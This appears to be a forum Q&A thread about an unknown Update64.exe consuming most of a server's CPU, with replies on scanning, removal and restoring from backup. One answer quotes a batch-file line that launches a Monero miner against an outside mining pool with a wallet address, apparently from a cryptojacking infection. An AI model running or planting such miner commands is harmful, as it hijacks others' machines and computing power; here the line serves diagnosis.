-1

I have tried finding out what Update64.exe really does. I think it might be a virus but there's not much out there on the topic. Does anyone know how to fix this? It's using pretty much 80-100% of CPU.

I have tried running the Microsoft Malicious Software Removal Tool. It didn't find anything. Might try Security Essentials next. But, I figured I would ask here just in case any of you guys ran into this issue before. Your positive input is highly appreciated.

DomainsFeatured
  • 181
  • 1
  • 1
  • 7
  • The Microsoft Malicious Software Removal Tool isn't a full featured, comprehensive anti-malware tool. It only looks for a specific and limited number of malicious programs. You need to scan this machine with a proper anti-malware tool. – joeqwerty Apr 27 '17 at 22:29
  • Upload the suspicious file to https://www.virustotal.com/ and scan it with multiple virus scanners at once. – Gerald Schneider Apr 28 '17 at 13:05
  • This sounds like ransomware in the process of encrypting your data. If it's not too late, pull power now and put the disk in a different computer to save what data you can. Under no circumstances should you pay the ransom. That helps fund further attacks, and makes you complicit in them. – Joel Coel Apr 28 '17 at 13:55

2 Answers2

0

We had a similar issue two days ago. We had a c:\windows\dell folder that contained the update64.exe. In that folder was also a couple batch files. One of which had this line: 

Update64 -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 45EngfR9yFHGSGLXMSVh88XuErCN95qQYirYNm4pVaJDakxthy3KWPP2hgDBVaAwcBafup6sefXML3CTYXmZfSJLUfHQQXW -p x -dbg -1

A few Google searches led us to this site as the source: httpX://monero.crypto-pool.fr/

This was a production server, so we tried for a bit, but ended up restoring from backup.

I say Reinstate Monica
  • 3,132
  • 7
  • 28
  • 52
Gregg Rousselle
  • 1
-1

I used Malwarebyte to scan and remove update64.exe Also deleted c:\windows\dell folder which had other viruses in it.

Jeffro Kao
  • 1